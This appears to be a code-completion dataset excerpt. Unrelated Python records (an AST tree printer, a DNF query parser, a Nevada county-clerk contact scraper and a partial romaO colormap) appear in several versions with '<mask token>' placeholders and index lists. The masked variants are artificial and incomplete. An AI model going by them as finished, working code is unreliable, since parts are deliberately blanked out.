self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Expression)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
@addToClass(BinaryExpression)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| from .ast import *
# noinspection PyPep8Naming
def addToClass(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def print_intended(to_print, intend):
print(intend * "| " + to_print)
# noinspection PyPep8Naming,PyUnresolvedReferences
class TreePrinter:
# General
@addToClass(Node)
def printTree(self, indent=0):
raise Exception("printTree not defined in class " + self.__class__.__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Expression)
def printTree(self, indent=0):
print_intended(self.type, indent)
# Instructions
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended("get_element", indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
# Expressions
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
@addToClass(BinaryExpression)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
# Other
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| [
13,
17,
20,
22,
26
] |
43 | 999de0965efa3c1fe021142a105dcf28184cd5ba | <mask token>
| <mask token>
def parse(query):
print('parsing the query...')
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query['$or']:
clauses = []
if '$and' in cp:
for clause in cp['$and']:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({'cp': cp, 'clauses': clauses})
return cp_clause_list, clause_list
| import dnf_converter
def parse(query):
print('parsing the query...')
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query['$or']:
clauses = []
if '$and' in cp:
for clause in cp['$and']:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({'cp': cp, 'clauses': clauses})
return cp_clause_list, clause_list
| import dnf_converter
def parse(query):
print("parsing the query...")
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query["$or"]:
clauses = []
if "$and" in cp:
for clause in cp["$and"]:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({ "cp": cp, "clauses": clauses })
return cp_clause_list, clause_list | null | [
0,
1,
2,
3
] |
44 | cb08f64d1ad7e53f1041684d4ca4ef65036c138d | <mask token>
class ElemIterator:
<mask token>
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
<mask token>
<mask token>
<mask token>
| <mask token>
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
<mask token>
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
<mask token>
| <mask token>
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
<mask token>
| import json
import re
from bs4 import BeautifulSoup
from bs4.element import NavigableString, Tag
from common import dir_path
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
if __name__ == '__main__':
main()
| import json
import re
from bs4 import BeautifulSoup
from bs4.element import NavigableString, Tag
from common import dir_path
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator():
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > (self.i)
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {
'locale': locale,
'county': locale,
'emails': emails,
}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search(r'Nevada \d{5}', el) or re.search(r'NV \d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ') # replace non-breaking space
matches1 = re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX (\(\d{3}\) \d{3}-\d{4})', el)
matches2 = re.search(r'(\(\d{3}\) \d{3}-VOTE \(\d{4}\)) FAX (\(\d{3}\) \d{3}-\d{4})', el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {
**init,
'locale': locale,
'official': official,
'address': ', '.join(address),
'emails': list(set(emails)),
'phones': [phone],
'faxes': [fax],
'url': url,
}
def main():
# Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information
# But it's behind a javascript test
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
if __name__ == '__main__':
main()
| [
4,
12,
13,
15,
16
] |
45 | 5082182af5a08970568dc1ab7a53ee5337260687 | <mask token>
| <mask token>
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| <mask token>
cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [
0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251,
0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968,
0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [
0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178,
0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379
], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567,
0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833,
0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [
0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584,
0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345,
0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [
0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742,
0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628,
0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [
0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075,
0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665,
0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [
0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602,
0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415,
0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [
0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311,
0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808,
0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [
0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419,
0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771,
0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [
0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222,
0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233,
0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [
0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394,
0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413,
0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [
0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666,
0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354,
0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [
0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914,
0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694,
0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [
0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989,
0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803,
0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [
0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239,
0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252,
0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [
0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592,
0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666,
0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [
0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367,
0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835,
0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [
0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337,
0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724,
0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [
0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595,
0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395,
0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [
0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553,
0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934,
0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [
0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408,
0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425,
0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [
0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448,
0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947,
0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [
0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037,
0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612,
0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [
0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,
0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [
0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207,
0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337,
0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [
0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658,
0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572,
0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [
0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066,
0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552,
0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [
0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,
0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [
0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978,
0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695,
0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [
0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811,
0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456,
0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [
0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,
0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [
0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178,
0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577,
0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [
0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627,
0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728,
0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [
0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927,
0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411,
0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [
0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336,
0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842,
0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [
0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655,
